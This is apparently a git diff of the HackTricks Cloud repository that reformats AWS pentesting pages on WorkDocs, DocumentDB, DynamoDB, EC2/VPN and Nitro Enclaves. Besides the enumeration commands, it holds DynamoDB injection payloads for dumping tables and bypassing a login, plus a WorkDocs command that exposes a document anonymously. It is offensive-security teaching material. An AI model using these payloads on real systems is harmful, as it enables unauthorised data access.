[https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1\_setup\_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) +You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) ### ~~Sharing AD (from attacker to victim)~~ @@ -94,7 +81,6 @@ AWS WorkDocs provides a web-based interface for users to upload, access, and man ### Enumeration -{% code overflow="wrap" %} ```bash # Get AD users (Admin not included) aws workdocs describe-users --organization-id @@ -123,25 +109,11 @@ aws workdocs describe-resource-permissions --resource-id aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` -{% endcode %} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-workdocs-privesc.md" %} -[aws-workdocs-privesc.md](../aws-privilege-escalation/aws-workdocs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-workdocs-privesc.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md new file mode 100644 index 000000000..0c97e360e --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md @@ -0,0 +1,42 @@ +# AWS - DocumentDB Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## DocumentDB + +Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. + +### Enumeration + +```bash +aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" +aws docdb describe-db-instances #Get hostnames from here + +# Parameter groups +aws docdb describe-db-cluster-parameter-groups +aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name + +# Snapshots +aws docdb describe-db-cluster-snapshots +aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier +``` + +### NoSQL Injection + +As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/nosql-injection +{{#endref}} + +### DocumentDB + +{{#ref}} +../aws-unauthenticated-enum-access/aws-documentdb-enum.md +{{#endref}} + +## References + +- [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md similarity index 60% rename from pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index 97e9beeae..173d8f224 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -1,19 +1,6 @@ # AWS - DynamoDB Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DynamoDB @@ -43,7 +30,7 @@ There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazo ```bash # Tables -aws dynamodb list-tables +aws dynamodb list-tables aws dynamodb describe-table --table-name #Get metadata info ## The primary key and sort key will appear inside the KeySchema field @@ -70,27 +57,27 @@ aws dynamodb describe-endpoints #Dynamodb endpoints ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md" %} -[aws-dynamodb-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-dynamodb-privesc.md" %} -[aws-dynamodb-privesc.md](../aws-privilege-escalation/aws-dynamodb-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-dynamodb-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} -[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-dynamodb-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-dynamodb-persistence.md" %} -[aws-dynamodb-persistence.md](../aws-persistence/aws-dynamodb-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-dynamodb-persistence.md +{{#endref}} ## DynamoDB Injection @@ -98,18 +85,19 @@ aws dynamodb describe-endpoints #Dynamodb endpoints There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. -{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/sql-injection +{{#endref}} ### NoSQL Injection In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ -You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API\_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) +You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. -{% hint style="info" %} -Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). -{% endhint %} +> [!NOTE] +> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). If you can **change the comparison** performed or add new ones, you could retrieve more data. @@ -120,23 +108,22 @@ If you can **change the comparison** performed or add new ones, you could retrie "GT": " " #All strings are greater than a space ``` -{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/nosql-injection +{{#endref}} ### Raw Json injection -{% hint style="danger" %} -**This vulnerability is based on dynamodb Scan Filter which is now deprecated!** -{% endhint %} +> [!CAUTION] +> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!** **DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. For example, injecting in a request like: -{% code overflow="wrap" %} ```bash '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' ``` -{% endcode %} an attacker could inject something like: @@ -173,11 +160,9 @@ password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none Some SDKs allows to use a string indicating the filtering to be performed like: -{% code overflow="wrap" %} ```java new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap) ``` -{% endcode %} You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. @@ -190,17 +175,4 @@ Therefore, a login like the previous one can be bypassed with something like: # which is always true ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md similarity index 68% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index 3ba4235a8..a3c8bc9b9 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -1,27 +1,14 @@ # AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## VPC & Networking Learn what a VPC is and about its components in: -{% content-ref url="aws-vpc-and-networking-basic-information.md" %} -[aws-vpc-and-networking-basic-information.md](aws-vpc-and-networking-basic-information.md) -{% endcontent-ref %} +{{#ref}} +aws-vpc-and-networking-basic-information.md +{{#endref}} ## EC2 @@ -29,16 +16,16 @@ Amazon EC2 is utilized for initiating **virtual servers**. It allows for the con Interesting things to enumerate in EC2: -* Virtual Machines - * SSH Keys - * User Data - * Existing EC2s/AMIs/Snapshots -* Networking - * Networks - * Subnetworks - * Public IPs - * Open ports -* Integrated connections with other networks outside AWS +- Virtual Machines + - SSH Keys + - User Data + - Existing EC2s/AMIs/Snapshots +- Networking + - Networks + - Subnetworks + - Public IPs + - Open ports +- Integrated connections with other networks outside AWS ### Instance Profiles @@ -50,7 +37,9 @@ This extra step is the **creation of an** [_**instance profile**_](https://docs. AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ### Enumeration @@ -85,7 +74,7 @@ aws ec2 describe-snapshots --owner-ids self aws ec2 describe-scheduled-instances # Get custom images -aws ec2 describe-images --owners self +aws ec2 describe-images --owners self # Get Elastic IPs aws ec2 describe-addresses @@ -96,7 +85,7 @@ aws ec2 get-console-output --instance-id [id] # Get VPN customer gateways aws ec2 describe-customer-gateways aws ec2 describe-vpn-gateways -aws ec2 describe-vpn-connections +aws ec2 describe-vpn-connections # List conversion tasks to upload/download VMs aws ec2 describe-conversion-tasks @@ -118,7 +107,7 @@ aws ec2 describe-key-pairs aws ec2 describe-internet-gateways # Get NAT Gateways -aws ec2 describe-nat-gateways +aws ec2 describe-nat-gateways # Get subnetworks aws ec2 describe-subnets @@ -136,29 +125,29 @@ aws ec2 describe-network-interfaces aws ec2 describe-route-tables # Get VPCs -aws ec2 describe-vpcs +aws ec2 describe-vpcs aws ec2 describe-vpc-peering-connections ``` ### Unauthenticated Access -{% content-ref url="../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md" %} -[aws-ec2-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +{{#endref}} ### Privesc In the following page you can check how to **abuse EC2 permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ec2-privesc.md" %} -[aws-ec2-privesc.md](../../aws-privilege-escalation/aws-ec2-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ec2-privesc.md +{{#endref}} ### Post-Exploitation -{% content-ref url="../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/" %} -[aws-ec2-ebs-ssm-and-vpc-post-exploitation](../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/ +{{#endref}} ## EBS @@ -174,9 +163,9 @@ An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is u In the following page you can check how to **abuse EBS permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ebs-privesc.md" %} -[aws-ebs-privesc.md](../../aws-privilege-escalation/aws-ebs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ebs-privesc.md +{{#endref}} ## SSM @@ -207,9 +196,9 @@ ps aux | grep amazon-ssm In the following page you can check how to **abuse SSM permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ssm-privesc.md" %} -[aws-ssm-privesc.md](../../aws-privilege-escalation/aws-ssm-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ssm-privesc.md +{{#endref}} ## ELB @@ -232,7 +221,6 @@ aws elbv2 describe-listeners --load-balancer-arn ### Enumeration -{% code overflow="wrap" %} ```bash # Launch templates aws ec2 describe-launch-templates @@ -247,7 +235,6 @@ aws autoscaling describe-launch-configurations aws autoscaling describe-load-balancer-target-groups aws autoscaling describe-load-balancers ``` -{% endcode %} ## Nitro @@ -255,9 +242,9 @@ AWS Nitro is a suite of **innovative technologies** that form the underlying pla Get more information and how to enumerate it from: -{% content-ref url="aws-nitro-enum.md" %} -[aws-nitro-enum.md](aws-nitro-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-nitro-enum.md +{{#endref}} ## VPN @@ -266,25 +253,25 @@ A VPN allows to connect your **on-premise network (site-to-site VPN)** or the ** #### Basic AWS VPN Components 1. **Customer Gateway**: - * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. + - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. 2. **Virtual Private Gateway**: - * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - * It is attached to your VPC and serves as the target for your VPN connection. - * VPG is the AWS side endpoint for the VPN connection. - * It handles the secure communication between your VPC and your on-premises network. + - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + - It is attached to your VPC and serves as the target for your VPN connection. + - VPG is the AWS side endpoint for the VPN connection. + - It handles the secure communication between your VPC and your on-premises network. 3. **Site-to-Site VPN Connection**: - * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - * This type of connection requires a Customer Gateway and a Virtual Private Gateway. - * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. + - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + - This type of connection requires a Customer Gateway and a Virtual Private Gateway. + - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. 4. **Client VPN Endpoint**: - * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - * With Client VPN, each client device uses a VPN client software to establish a secure connection. + - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + - With Client VPN, each client device uses a VPN client software to establish a secure connection. You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). @@ -328,25 +315,12 @@ If a **VPN connection was stablished** you should search for **`.opvn`** config #### **Post Exploitaiton** -{% content-ref url="../../aws-post-exploitation/aws-vpn-post-exploitation.md" %} -[aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-vpn-post-exploitation.md +{{#endref}} ## References -* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) +- [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md similarity index 76% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md index 2e40121df..0c37fd609 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md @@ -1,19 +1,6 @@ # AWS - Nitro Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,9 +10,8 @@ AWS Nitro is a suite of **innovative technologies** that form the underlying pla **AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. -{% hint style="danger" %} -Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. -{% endhint %} +> [!CAUTION] +> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. ## Nitro Enclave CLI installation @@ -82,13 +68,11 @@ As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/even /etc/nitro_enclaves/allocator.yaml ``` -{% hint style="danger" %} -Always remember that you need to **reserve some resources for the parent EC2** instance also! -{% endhint %} +> [!CAUTION] +> Always remember that you need to **reserve some resources for the parent EC2** instance also! After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: -{% code overflow="wrap" %} ```shell # Restart the service so the new default values apply sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service @@ -96,7 +80,6 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n # Indicate the CPUs and memory to give nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 ``` -{% endcode %} ### Enumerate Enclaves @@ -127,9 +110,8 @@ The only way to communicate with an **enclave** running image is using **vsocks* **Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. -{% hint style="success" %} -Therefore, an vsock address looks like this: `:` -{% endhint %} +> [!TIP] +> Therefore, an vsock address looks like this: `:` To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: @@ -159,15 +141,14 @@ To find **CIDs** of the enclave running images you could just execute the follow ] -{% hint style="warning" %} -Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). -{% endhint %} +> [!WARNING] +> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). ### Vsock Server/Listener Find here a couple of examples: -* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py) +- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
@@ -176,7 +157,7 @@ Find here a couple of examples: ```python #!/usr/bin/env python3 -# From +# From https://medium.com/@F.DL/understanding-vsock-684016cf0eb0 import socket @@ -210,7 +191,7 @@ socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" Examples: -* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py) +- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
@@ -251,17 +232,15 @@ This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:4 ```yaml allowlist: -- {address: ip-ranges.amazonaws.com, port: 443} + - { address: ip-ranges.amazonaws.com, port: 443 } ``` It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): -{% code overflow="wrap" %} ```bash sudo ss -l -p -n | grep v_str -v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) +v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) ``` -{% endcode %} ## Nitro Enclave Atestation & KMS @@ -273,9 +252,8 @@ From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. -{% hint style="success" %} -Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. -{% endhint %} +> [!TIP] +> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. ### PCR Bypass @@ -287,20 +265,7 @@ The research on how to modify/create new images to bypass each protection (spcia ## References -* [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) -* All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) +- [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) +- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
